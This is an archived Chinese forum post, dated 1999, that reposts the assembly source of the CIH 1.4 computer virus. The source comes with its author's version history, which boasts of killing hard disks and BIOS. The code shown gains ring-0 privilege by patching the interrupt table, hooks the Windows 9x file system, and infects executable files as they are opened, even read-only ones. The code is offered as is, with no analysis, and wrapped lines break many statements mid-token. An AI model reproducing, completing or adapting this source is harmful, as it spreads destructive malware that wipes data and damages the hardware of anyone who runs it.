精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>电脑技术>>● 计算机安全>>◇程序代码◇>>CIH 1.4源程序

主题:CIH 1.4源程序
发信人: williamlong()
整理人: williamlong(1999-04-28 11:35:27), 站内信件
; ********************************************************************
********   
; *                     The Virus Program Information                 
       *   
; ********************************************************************
********   
; *                                                                   
       *   
; *     Designer : CIH                  Source : TTIT of TATUNG in Tai
wan    *   
; *     Create Date : 04/26/1998        Now Version : 1.4             
       *   
; *     Modification Time : 05/31/1998                                
       *   
; *                                                                   
       *   
; *     Turbo Assembler Version 4.0     : tasm /m cih                 
       *   
; *     Turbo Link Version 3.01         : tlink /3 /t cih, cih.exe    
       *   
; *                                                                   
       *   
; *===================================================================
=======*   
; *                     Modification History                          
       *   
; *===================================================================
=======*   
; *     v1.0    1. Create the Virus Program.                          
       *   
; *             2. The Virus Modifies IDT to Get Ring0 Privilege.     
       *   
; * 04/26/1998  3. Virus Code doesn't Reload into System.             
       *   
; *             4. Call IFSMgr_InstallFileSystemApiHook to Hook File S
ystem. *   
; *             5. Modifies Entry Point of IFSMgr_InstallFileSystemApi
Hook.  *   
; *             6. When System Opens Existing PE File, the File will b
e      *   
; *                Infected, and the File doesn't be Reinfected.      
       *   
; *             7. It is also Infected, even the File is Read-Only.   
       *   
; *             8. When the File is Infected, the Modification Date an
d Time *   
; *                of the File also don't be Changed.                 
       *   
; *             9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not
 Call  *   
; *                Previous FileSystemApiHook, it will Call the Functi
on     *   
; *                that the IFS Manager Would Normally Call to Impleme
nt     *   
; *                this Particular I/O Request.                       
       *   
; *            10. The Virus Size is only 656 Bytes.                  
       *   
; *===================================================================
=======*   
; *     v1.1    1. Especially, the File that be Infected will not Incr
ease   *   
; *                it's Size...   ^__^                                
       *   
; * 05/15/1998  2. Hook and Modify Structured Exception Handing.      
       *   
; *                When Exception Error Occurs, Our OS System should b
e in   *   
; *                Windows NT. So My Cute Virus will not Continue to R
un,    *   
; *                it will Jmup to Original Application to Run.       
       *   
; *             3. Use Better Algorithm, Reduce Virus Code Size.      
       *   
; *             4. The Virus "Basic" Size is only 796 Bytes.          
       *   
; *===================================================================
=======*   
; *     v1.2    1. Kill All HardDisk, and BIOS... Super... Killer...  
       *   
; *             2. Modify the Bug of v1.1                             
       *   
; * 05/21/1998  3. The Virus "Basic" Size is 1003 Bytes.              
       *   
; *===================================================================
=======*   
; *     v1.3    1. Modify the Bug that WinZip Self-Extractor Occurs Er
ror.   *   
; *                So When Open WinZip Self-Extractor ==> Don't Infect
 it.   *   
; * 05/24/1998  2. The Virus "Basic" Size is 1010 Bytes.              
       *   
; *===================================================================
=======*   
; *     v1.4    1. Full Modify the Bug : WinZip Self-Extractor Occurs 
Error. *   
; *             2. Change the Date of Killing Computers.              
       *   
; * 05/31/1998  3. Modify Virus Version Copyright.                    
       *   
; *             4. The Virus "Basic" Size is 1019 Bytes.              
       *   
; ********************************************************************
********   
                                                                      
           
                .586P                                                 
           
                                                                      
           
; ********************************************************************
********   
; *             Original PE Executable File(Don't Modify this Section)
       *   
; ********************************************************************
********   
                                                                      
           
OriginalAppEXE  SEGMENT                                               
           
                                                                      
           
FileHeader:                                                           
           
                db      04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
           
                db      004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
           
                db      0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
           
                db      00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
           
                db      021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
           
                db      069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
           
                db      061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
           
                db      074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
           
                db      020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
           
                db      06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
           
                db      024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
           
                db      0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
           
                db      00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
           
                db      000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
           
                db      000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
           
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
           
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
           
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                db      0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
           
                dd      00000000h, VirusSize                          
           
                                                                      
           
                        lea     ecx, StopToRunVirusCode-@0[ebx]       
           
                        push    ecx                                   
           
                                                                      
           
                        push    eax                                   
           
                                                                      
           
; *************************************                               
           
; * Let's Modify                      *                               
           
; * IDT(Interrupt Descriptor Table)   *                               
           
; * to Get Ring0 Privilege...         *                               
           
; *************************************                               
           
                                                                      
           
                        push    eax             ;                     
           
                        sidt    [esp-02h]       ; Get IDT Base Address
           
                        pop     ebx             ;                     
           
                                                                      
           
                        add     ebx, HookExceptionNumber*08h+04h ; ZF 
= 0        
                                                                      
           
                        cli                                           
           
                                                                      
           
                        mov     ebp, [ebx]      ; Get Exception Base  
           
                        mov     bp, [ebx-04h]   ; Entry Point         
           
                                                                      
           
                        lea     esi, MyExceptionHook-@1[ecx]          
           
                                                                      
           
                        push    esi                                   
           
                                                                      
           
                        mov     [ebx-04h], si           ;             
           
                        shr     esi, 16                 ; Modify Excep
tion       
                        mov     [ebx+02h], si           ; Entry Point 
Address    
                                                                      
           
                        pop     esi                                   
           
                                                                      
           
; *************************************                               
           
; * Generate Exception to Get Ring0   *                               
           
; *************************************                               
           
                                                                      
           
                        int     HookExceptionNumber     ; GenerateExce
ption      
ReturnAddressOfEndException     =       $                             
           
                                                                      
           
; *************************************                               
           
; * Merge All Virus Code Section      *                               
           
; *************************************                               
           
                                                                      
           
; *************************************                               
           
; * Generate Exception Again          *                               
           
; *************************************                               
           
                                                                      
           
                        int     HookExceptionNumber     ; GenerateExce
ption Aga  
                                                                      
           
                                                                      
           
; *************************************                               
           
; * Let's Restore                     *                               
           
; * Structured Exception Handing      *                               
           
; *************************************                               
           
                                                                      
           
ReadyRestoreSE:                                                       
           
                        sti                                           
           
                                                                      
           
                        xor     ebx, ebx                              
           
                                                                      
           
                        jmp     RestoreSE                             
           
                                                                      
           
; *************************************                               
           
; * When Exception Error Occurs,      *                               
           
; * Our OS System should be in NT.    *                               
           
; * So My Cute Virus will not         *                               
           
; * Continue to Run, it Jmups to      *                               
           
; * Original Application to Run.      *                               
           
; *************************************                               
           
                                                                      
           
StopToRunVirusCode:                                                   
           
@1                      =       StopToRunVirusCode                    
           
                                                                      
           
                        xor     ebx, ebx                              
           
                        mov     eax, fs:[ebx]                         
           
                        mov     esp, [eax]                            
           
                                                                      
           
RestoreSE:                                                            
           
                        pop     dword ptr fs:[ebx]                    
           
                        pop     eax                                   
           
                                                                      
           
; *************************************                               
           
; * Return Original App to Execute    *                               
           
; *************************************                               
           
                                                                      
           
                        pop     ebp                                   
           
                                                                      
           
                        push    00401000h       ; Push Original       
           
OriginalAddressOfEntryPoint     =       $-4     ; App Entry Point to S
tack       
                                                                      
           
                        ret     ; Return to Original App Entry Point  
           
                                                                      
           
; *********************************************************           
           
; *             Ring0 Virus Game Initial Program          *           
           
; *********************************************************           
           
                                                                      
           
MyExceptionHook:                                                      
           
@2                      =       MyExceptionHook                       
           
                                                                      
           
                        jz      InstallMyFileSystemApiHook            
           
                                                                      
           
; *************************************                               
           
; * Do My Virus Exist in System !?    *                               
           
; *************************************                               
           
                                                                      
           
                        mov     ecx, dr0                              
           
                        jecxz   AllocateSystemMemoryPage              
           
                                                                      
           
                        add     dword ptr [esp], ReadyRestoreSE-Return
AddressOf  
dException                                                            
           
                                                                      
           
; *************************************                               
           
; * Return to Ring3 Initial Program   *                               
           
; *************************************                               
           
                                                                      
           
ExitRing0Init:                                                        
           
                        mov     [ebx-04h], bp   ;                     
           
                        shr     ebp, 16         ; Restore Exception   
           
                        mov     [ebx+02h], bp   ;                     
           
                                                                      
           
                        iretd                                         
           
                                                                      
           
; *************************************                               
           
; * Allocate SystemMemory Page to Use *                               
           
; *************************************                               
           
                                                                      
           
AllocateSystemMemoryPage:                                             
           
                                                                      
           
                        mov     dr0, ebx        ; Set the Mark of My V
irus Exis  
in System                                                             
           
                                                                      
           
                        push    00000000fh      ;                     
           
                        push    ecx             ;                     
           
                        push    0ffffffffh      ;                     
           
                        push    ecx             ;                     
           
                        push    ecx             ;                     
           
                        push    ecx             ;                     
           
                        push    000000001h      ;                     
           
                        push    000000002h      ;                     
           
                        int     20h             ; VMMCALL _PageAllocat
e          
_PageAllocate           =       $               ;                     
           
                        dd      00010053h       ; Use EAX, ECX, EDX, a
nd flags   
                        add     esp, 08h*04h                          
           
                                                                      
           
                        xchg    edi, eax        ; EDI = SystemMemory S
tart Addr  
s                                                                     
           
                                                                      
           
                        lea     eax, MyVirusStart-@2[esi]             
           
                                                                      
           
                        iretd   ; Return to Ring3 Initial Program     
           
                                                                      
           
; *************************************                               
           
; * Install My File System Api Hook   *                               
           
; *************************************                               
           
                                                                      
           
InstallMyFileSystemApiHook:                                           
           
                                                                      
           
                        lea     eax, FileSystemApiHook-@6[edi]        
           
                                                                      
           
                        push    eax  ;                                
           
                        int     20h  ; VXDCALL IFSMgr_InstallFileSyste
mApiHook   
IFSMgr_InstallFileSystemApiHook =       $       ;                     
           
                        dd      00400067h       ; Use EAX, ECX, EDX, a
nd flags   
                                                                      
           
                        mov     dr0, eax        ; Save OldFileSystemAp
iHook Add  
ss                                                                    
           
                                                                      
           
                        pop     eax     ; EAX = FileSystemApiHook Addr
ess        
                                                                      
           
                        ; Save Old IFSMgr_InstallFileSystemApiHook Ent
ry Point   
                        mov     ecx, IFSMgr_InstallFileSystemApiHook-@
2[esi]     
                        mov     edx, [ecx]                            
           
                        mov     OldInstallFileSystemApiHook-@3[eax], e
dx         
                                                                      
           
                        ; Modify IFSMgr_InstallFileSystemApiHook Entry
 Point     
                        lea     eax, InstallFileSystemApiHook-@3[eax] 
           
                        mov     [ecx], eax                            
           
                                                                      
           
                        cli                                           
           
                                                                      
           
                        jmp     ExitRing0Init                         
           
                                                                      
           
; *********************************************************           
           
; *             Code Size of Merge Virus Code Section     *           
           
; *********************************************************           
           
                                                                      
           
CodeSizeOfMergeVirusCodeSection         =       offset $              
           
                                                                      
           
; *********************************************************           
           
; *             IFSMgr_InstallFileSystemApiHook           *           
           
; *********************************************************           
           
                                                                      
           
InstallFileSystemApiHook:                                             
           
                        push    ebx                                   
           
                                                                      
           
                        call    @4      ;                             
           
@4:                                     ;                             
           
                        pop     ebx     ; mov ebx, offset FileSystemAp
iHook      
                        add     ebx, FileSystemApiHook-@4       ;     
           
                                                                      
           
                        push    ebx                                   
           
                        int     20h  ; VXDCALL IFSMgr_RemoveFileSystem
ApiHook    
IFSMgr_RemoveFileSystemApiHook  =       $                             
           
                        dd      00400068h       ; Use EAX, ECX, EDX, a
nd flags   
                        pop     eax                                   
           
                                                                      
           
                        ; Call Original IFSMgr_InstallFileSystemApiHoo
k          
                        ; to Link Client FileSystemApiHook            
           
                        push    dword ptr [esp+8]                     
           
                        call    OldInstallFileSystemApiHook-@3[ebx]   
           
                        pop     ecx                                   
           
                                                                      
           
                        push    eax                                   
           
                                                                      
           
                        ; Call Original IFSMgr_InstallFileSystemApiHoo
k          
                        ; to Link My FileSystemApiHook                
           
                        push    ebx                                   
           
                        call    OldInstallFileSystemApiHook-@3[ebx]   
           
                        pop     ecx                                   
           
                                                                      
           
                        mov     dr0, eax        ; Adjust OldFileSystem
ApiHook A  
ress                                                                  
           
                                                                      
           
                        pop     eax                                   
           
                                                                      
           
                        pop     ebx                                   
           
                                                                      
           
                        ret                                           
           
                                                                      
           
; *********************************************************           
           
; *                     Static Data                       *           
           
; *********************************************************           
           
                                                                      
           
OldInstallFileSystemApiHook     dd      ?                             
           
                                                                      
           
; *********************************************************           
           
; *             IFSMgr_FileSystemHook                     *           
           
; *********************************************************           
           
                                                                      
           
; *************************************                               
           
; * IFSMgr_FileSystemHook Entry Point *                               
           
; *************************************                               
           
                                                                      
           
FileSystemApiHook:                                                    
           
@3                      =       FileSystemApiHook                     
           
                                                                      
           
                        pushad                                        
           
                                                                      
           
                        call    @5      ;                             
           
@5:                                     ;                             
           
                        pop     esi     ; mov esi, offset VirusGameDat
aStartAdd  
ss                                                                    
           
                        add     esi, VirusGameDataStartAddress-@5     
           
                                                                      
           
; *************************************                               
           
; * Is OnBusy !?                      *                               
           
; *************************************                               
           
                                                                      
           
                        test    byte ptr (OnBusy-@6)[esi], 01h  ; if (
 OnBusy )  
                        jnz     pIFSFunc                        ; goto
 pIFSFunc  
                                                                      
           
; *************************************                               
           
; * Is OpenFile !?                    *                               
           
; *************************************                               
           
                                                                      
           
                        ; if ( NotOpenFile )                          
           
                        ; goto prevhook                               
           
                        lea     ebx, [esp+20h+04h+04h]                
           
                        cmp     dword ptr [ebx], 00000024h            
           
                        jne     prevhook                              
           
                                                                      
           
; *************************************                               
           
; * Enable OnBusy                     *                               
           
; *************************************                               
           
                                                                      
           
                        inc     byte ptr (OnBusy-@6)[esi]       ; Enab
le OnBusy  
                                                                      
           
; *************************************                               
           
; * Get FilePath's DriveNumber,       *                               
           
; * then Set the DriveName to         *                               
           
; * FileNameBuffer.                   *                               
           
; *************************************                               
           
; * Ex. If DriveNumber is 03h,        *                               
           
; *     DriveName is 'C:'.            *                               
           
; *************************************                               
           
                                                                      
           
                        ; mov esi, offset FileNameBuffer              
           
                        add     esi, FileNameBuffer-@6                
           
                                                                      
           
                        push    esi                                   
           
                                                                      
           
                        mov     al, [ebx+04h]                         
           
                        cmp     al, 0ffh                              
           
                        je      CallUniToBCSPath                      
           
                                                                      
           
                        add     al, 40h                               
           
                        mov     ah, ':'                               
           
                                                                      
           
                        mov     [esi], eax                            
           
                                                                      
           
                        inc     esi                                   
           
                        inc     esi                                   
           
                                                                      
           
; *************************************                               
           
; * UniToBCSPath                      *                               
           
; *************************************                               
           
; * This Service Converts             *                               
           
; * a Canonicalized Unicode Pathname  *                               
           
; * to a Normal Pathname in the       *                               
           
; * Specified BCS Character Set.      *                               
           
; *************************************                               
           
                                                                      
           
CallUniToBCSPath:                                                     
           
                        push    00000000h                             
           
                        push    FileNameBufferSize                    
           
                        mov     ebx, [ebx+10h]                        
           
                        mov     eax, [ebx+0ch]                        
           
                        add     eax, 04h                              
           
                        push    eax                                   
           
                        push    esi                                   
           
                        int     20h     ; VXDCall UniToBCSPath        
           
UniToBCSPath            =       $                                     
           
                        dd      00400041h                             
           
                        add     esp, 04h*04h                          
           
                                                                      
           
; *************************************                               
           
; * Is FileName '.EXE' !?             *                               
           
; *************************************                               
           
                                                                      
           
                        ; cmp [esi+eax-04h], '.EXE'                   
           
                        cmp     [esi+eax-04h], 'EXE.'                 
           
                        pop     esi                                   
           
                        jne     DisableOnBusy                         
           
                                                                      
           
IF      DEBUG                                                         
           
                                                                      
           
; *************************************                               
           
; * Only for Debug                    *                               
           
; *************************************                               
           
                                                                      
           
                        ; cmp [esi+eax-06h], 'FUCK'                   
           
                        cmp     [esi+eax-06h], 'KCUF'                 
           
                        jne     DisableOnBusy                         
           
                                                                      
           
ENDIF                                                                 
           
                                                                      
           
; *************************************                               
           
; * Is Open Existing File !?          *                               
           
; *************************************                               
           
                                                                      
           
                        ; if ( NotOpenExistingFile )                  
           
                        ; goto DisableOnBusy                          
           
                        cmp     word ptr [ebx+18h], 01h               
           
                        jne     DisableOnBusy                         
           
                                                                      
           
; *************************************                               
           
; * Get Attributes of the File        *                               
           
; *************************************                               
           
                                                                      
           
                        mov     ax, 4300h                             
           
                        int     20h     ; VXDCall IFSMgr_Ring0_FileIO 
           
IFSMgr_Ring0_FileIO     =       $                                     
           
                        dd      00400032h                             
           
                                                                      
           
                        jc      DisableOnBusy                         
           
                                                                      
           
                        push    ecx                                   
           
                                                                      
           
; *************************************                               
           
; * Get IFSMgr_Ring0_FileIO Address   *                               
           
; *************************************                               
           
                                                                      
           
                        mov     edi, dword ptr (IFSMgr_Ring0_FileIO-@7
)[esi]     
                        mov     edi, [edi]                            
           
                                                                      
           
; *************************************                               
           
; * Is Read-Only File !?              *                               
           
; *************************************                               
           
                                                                      
           
                        test    cl, 01h                               
           
                        jz      OpenFile                              
           
                                                                      
           
; *************************************                               
           
; * Modify Read-Only File to Write    *                               
           
; *************************************                               
           
                                                                      
           
                        mov     ax, 4301h                             
           
                        xor     ecx, ecx                              
           
                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO 
           
                                                                      
           
; *************************************                               
           
; * Open File                         *                               
           
; *************************************                               
           
                                                                      
           
OpenFile:                                                             
           
                        xor     eax, eax                              
           
                        mov     ah, 0d5h                              
           
                        xor     ecx, ecx                              
           
                        xor     edx, edx                              
           
                        inc     edx                                   
           
                        mov     ebx, edx                              
           
                        inc     ebx                                   
           
                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO 
           
                                                                      
           
                        xchg    ebx, eax        ; mov ebx, FileHandle 
           
                                                                      
           
; *************************************                               
           
; * Need to Restore                   *                               
           
; * Attributes of the File !?         *                               
           
; *************************************                               
           
                                                                      
           
                        pop     ecx                                   
           
                                                                      
           
                        pushf                                         
           
                                                                      
           
                        test    cl, 01h                               
           
                        jz      IsOpenFileOK                          
           
                                                                      
           
; *************************************                               
           
; * Restore Attributes of the File    *                               
           
; *************************************                               
           
                                                                      
           
                        mov     ax, 4301h                             
           
                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO 
           
                                                                      
           
; *************************************                               
           
; * Is Open File OK !?                *                               
           
; *************************************                               
           
                                                                      
           
IsOpenFileOK:                                                         
           
                        popf                                          
           
                                                                      
           
                        jc      DisableOnBusy                         
           
                                                                      
           
; *************************************                               
           
; * Open File Already Succeed.   ^__^ *                               
           
; *************************************                               
           
                                                                      
           
                        push    esi     ; Push FileNameBuffer Address 
to Stack   
                                                                      
           
                        pushf           ; Now CF = 0, Push Flag to Sta
ck         
                                                                      
           
                        add     esi, DataBuffer-@7 ; mov esi, offset D
ataBuffer  
                                                                      
           
; ***************************                                         
           
; * Get OffsetToNewHeader   *                                         
           
; ***************************                                         
           
                                                                      
           
                        xor     eax, eax                              
           
                        mov     ah, 0d6h                              
           
                                                                      
           
                        ; For Doing Minimal VirusCode's Length,       
           
                        ; I Save EAX to EBP.                          
           
                        mov     ebp, eax                              
           
                                                                      
           
                        push    00000004h                             
           
                        pop     ecx                                   
           
                        push    0000003ch                             
           
                        pop     edx                                   
           
                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO 
           
                                                                      
           
; * EDX = 'PE\0\0' Signature of       *                               
           
; *       ImageFileHeader Pointer's   *                               
           
; *       Former Byte.                *                               
           
; * ESI = DataBuffer Address ==> @8   *                               
           
; * EDI = IFSMgr_Ring0_FileIO Address *                               
           
; * EBP = D600h ==> Read Data in File *                               
           
; *************************************                               
           
; * Stack Dump :                      *                               
           
; *                                   *                               
           
; * ESP => -------------------------  *                               
           
; *        |       EFLAG(CF=0)     |  *                               
           
; *        -------------------------  *                               
           
; *        | FileNameBufferPointer |  *                               
           
; *        -------------------------  *                               
           
; *        |          EDI          |  *                               
           
; *        -------------------------  *                               
           
; *        |          ESI          |  *                               
           
; *        -------------------------  *                               
           
; *        |          EBP          |  *                               
           
; *        -------------------------  *                               
           
; *        |          ESP          |  *                               
           
; *        -------------------------  *                               
           
; *        |          EBX          |  *                               
           
; *        -------------------------  *                               
           
; *        |          EDX          |  *                               
           
; *        -------------------------  *                               
           
; *        |          ECX          |  *                               
           
; *        -------------------------  *                               
           
; *        |          EAX          |  *                               
           
; *        -------------------------  *                               
           
; *        |     Return Address    |  *                               
           
; *        -------------------------  *                               
           
; *************************************                               
           
                                                                      
           
                        push    ebx     ; Save File Handle            
           
                                                                      
           
                        push    00h     ; Set VirusCodeSectionTableEnd
Mark       
                                                                      
           
; ***************************                                         
           
; * Let's Set the           *                                         
           
; * Virus' Infected Mark    *                                         
           
; ***************************                                         
           
                                                                      
           
                        push    01h     ; Size                        
           
                        push    edx     ; Pointer of File             
           
                        push    edi     ; Address of Buffer           
           
                                                                      
           
; ***************************                                         
           
; * Save ESP Register       *                                         
           
; ***************************                                         
           
                                                                      
           
                        mov     dr1, esp                              
           
                                                                      
           
; ***************************                                         
           
; * Let's Set the           *                                         
           
; * NewAddressOfEntryPoint  *                                         
           
; * ( Only First Set Size ) *                                         
           
; ***************************                                         
           
                                                                      
           
                        push    eax     ; Size                        
           
                                                                      
           
; ***************************                                         
           
; * Let's Read              *                                         
           
; * Image Header in File    *                                         
           
; ***************************                                         
           
                                                                      
           
                        mov     eax, ebp                              
           
                        mov     cl, SizeOfImageHeaderToRead           
           
                        add     edx, 07h ; Move EDX to NumberOfSection
s          
                        call    edi      ; VXDCall IFSMgr_Ring0_FileIO
           
                                                                      
           
; ***************************                                         
           
; * Let's Set the           *                                         
           
; * NewAddressOfEntryPoint  *                                         
           
; * ( Set Pointer of File,  *                                         
           
; *   Address of Buffer   ) *                                         
           
; ***************************                                         
           
                                                                      
           
                        lea     eax, (AddressOfEntryPoint-@8)[edx]    
           
                        push    eax     ; Pointer of File             
           
                                                                      
           
                        lea     eax, (NewAddressOfEntryPoint-@8)[esi] 
           
                        push    eax     ; Address of Buffer           
           
                                                                      
           
; ***************************                                         
           
; * Move EDX to the Start   *                                         
           
; * of SectionTable in File *                                         
           
; ***************************                                         
           
                                                                      
           
                        movzx   eax, word ptr (SizeOfOptionalHeader-@8
)[esi]     
                        lea     edx, [eax+edx+12h]                    
           
                                                                      
           
; ***************************                                         
           
; * Let's Get               *                                         
           
; * Total Size of Sections  *                                         
           
; ***************************                                         
           
                                                                      
           
                        mov     al, SizeOfScetionTable                
           
                                                                      
           
                        ; I Assume NumberOfSections <= 0ffh

mov cl, (NumberOfSections-@8)[esi]



mul cl



; ***************************

; * Let's Set Section Table *

; ***************************



; Move ESI to the Start of SectionTable

lea esi, (StartOfSectionTable-@8)[esi]



push eax ; Size

push edx ; Pointer of File

push esi ; Address of Buffer



; ***************************

; * The Code Size of Merge *

; * Virus Code Section and *

; * Total Size of Virus *

; * Code Section Table Must *

; * be Small or Equal the *

; * Unused Space Size of *

; * Following Section Table *

; ***************************



inc ecx

push ecx ; Save NumberOfSections+1



shl ecx, 03h

push ecx ; Save TotalSizeOfVirusCodeSec
tionTable


add ecx, eax

add ecx, edx



sub ecx, (SizeOfHeaders-@9)[esi]

not ecx

inc ecx



; Save My Virus First Section Code

; Size of Following Section Table...

; ( Not Include the Size of Virus Code Section
Table )
push ecx



xchg ecx, eax ; ECX = Size of Sectio
n Table


; Save Original Address of Entry Point

mov eax, (AddressOfEntryPoint-@9)[esi]

add eax, (ImageBase-@9)[esi]

mov (OriginalAddressOfEntryPoint-@9)[esi],
eax


cmp word ptr [esp], small CodeSizeOfMergeV
irusCodeS
tion

jl OnlySetInfectedMark



; ***************************

; * Read All Section Tables *

; ***************************



mov eax, ebp

call edi ; VXDCall IFSMgr_Ring0_FileIO



; ***************************

; * Full Modify the Bug : *

; * WinZip Self-Extractor *

; * Occurs Error... *

; ***************************

; * So When User Opens *

; * WinZip Self-Extractor, *

; * Virus Doesn't Infect it.*

; ***************************

; * First, Virus Gets the *

; * PointerToRawData in the *

; * Second Section Table, *

; * Reads the Section Data, *

; * and Tests the String of *

; * 'WinZip(R)'...... *

; ***************************



xchg eax, ebp



push 00000004h

pop ecx



push edx

mov edx, (SizeOfScetionTable+PointerToRawD
ata-@9)[e
]

add edx, 12h



call edi ; VXDCall IFSMgr_Ring0_FileIO



; cmp [esi], 'nZip'

cmp dword ptr [esi], 'piZn'

je NotSetInfectedMark



pop edx



; ***************************

; * Let's Set Total Virus *

; * Code Section Table *

; ***************************



; EBX = My Virus First Section Code

; Size of Following Section Table

pop ebx

pop edi ; EDI = TotalSizeOfVirusCodeSe
ctionTabl
pop ecx ; ECX = NumberOfSections+1



push edi ; Size



add edx, ebp

push edx ; Pointer of File



add ebp, esi

[关闭][返回]